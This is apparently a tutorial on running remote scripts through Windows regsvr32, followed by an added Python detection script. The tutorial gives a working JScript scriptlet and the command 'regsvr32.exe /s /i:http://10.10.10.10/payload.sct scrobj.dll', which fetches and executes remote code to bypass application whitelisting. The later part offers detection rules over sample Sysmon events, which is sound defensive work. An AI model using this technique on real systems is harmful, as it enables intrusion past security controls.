Hi! Today we will talk about running remote scripts using regsvr32.
First of all, what is regsvr32?
Regsvr32 is a command-line utility in Microsoft Windows and ReactOS for registering and unregistering DLLs.
Usage example:
regsvr32 file.dll      # registering a DLL
regsvr32 /u file.dll   # unregistering a DLL
Using the /i parameter of regsvr32, we can execute JScript or VBScript code embedded in an XML scriptlet; the parameter passes an install string to the DLL, which is used to trigger any initial installation processing.
Executing JScript or VBScript code means that we can execute commands to gain access, and our payload will run under the regsvr32 process, bypassing application whitelisting.
Let's start!
We will use calc.exe as the program that will be executed, and Process Hacker for viewing the process.
Let's save our payload with the .sct file extension:
<?XML version="1.0"?>
<scriptlet>
  <registration progid="Pentest" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
      <![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
      ]]>
    </script>
  </registration>
</scriptlet>
and save it on our VPS.
Then we can start a simple Python 3 HTTP server with:
python3 -m http.server 80
After running the server, we will use this command to run our payload:
regsvr32.exe /s /i:http://10.10.10.10/payload.sct scrobj.dll
And we are done!
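From the defender's side, the command shown above has a very recognisable shape in process-creation telemetry: regsvr32.exe with an /i: argument that points at an HTTP(S) URL or UNC path, scrobj.dll passed as the DLL, and regsvr32.exe itself appearing as the parent of whatever the scriptlet launched (calc.exe here). The following Python script is an added example, not code from the original post; it runs that logic over a few constructed Sysmon-style events (the field names Image, CommandLine and ParentImage are assumed to match an Event ID 1 export, and the sample values are made up for illustration).

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not taken from the original post).
# Event 0 mirrors the post's command; event 1 is a normal vendor DLL registration;
# event 2 uses a UNC path instead of HTTP; event 3 is the child process that the
# scriptlet's WScript.Shell.Run call would produce.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /i:http://10.10.10.10/payload.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\component.dll",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /u /i:\\fileserver\share\reg.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\calc.exe",
     "CommandLine": r"calc.exe",
     "ParentImage": r"C:\Windows\System32\regsvr32.exe"},
]

# /i: followed by an http(s) URL or a UNC path (two leading backslashes).
# The install string is the only regsvr32 switch that legitimately takes free text,
# so a remote location here is the key indicator.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(?P<target>(https?://|\\\\)\S+)", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    detail: str


def analyze_event(event: dict) -> list:
    """Return the list of findings for one process-creation event."""
    findings = []
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()

    if image.endswith("regsvr32.exe"):
        # Rule 1: install string points outside the local filesystem.
        m = REMOTE_SCRIPTLET.search(cmd)
        if m:
            findings.append(Finding(
                "regsvr32_remote_scriptlet",
                f"/i: points to remote location {m.group('target')}"))
        # Rule 2: scrobj.dll is the scriptlet host; ordinary COM DLL
        # registrations do not name it.
        if "scrobj.dll" in cmd.lower():
            findings.append(Finding(
                "regsvr32_scrobj",
                "scrobj.dll passed to regsvr32 (scriptlet execution host)"))

    # Rule 3: regsvr32 normally registers a DLL and exits; it does not spawn
    # other programs. A child process is what WScript.Shell.Run produces.
    if parent.endswith("regsvr32.exe") and not image.endswith("regsvr32.exe"):
        findings.append(Finding(
            "regsvr32_child_process",
            f"regsvr32.exe spawned {image}"))

    return findings


def triage(events: list) -> list:
    """Return (index, findings) for every event that triggered at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        f = analyze_event(ev)
        if f:
            hits.append((i, f))
    return hits


if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}")
        for f in findings:
            print(f"  [{f.rule}] {f.detail}")
```

Each rule stands on its own so they can be fed separately into a SIEM: the remote /i: and scrobj.dll checks fire on the regsvr32 event itself, while the child-process rule catches the follow-on program even when the command line was obfuscated or truncated in the log. The benign vendor registration in event 1 produces no findings, which is the false-positive case to keep in mind when tuning.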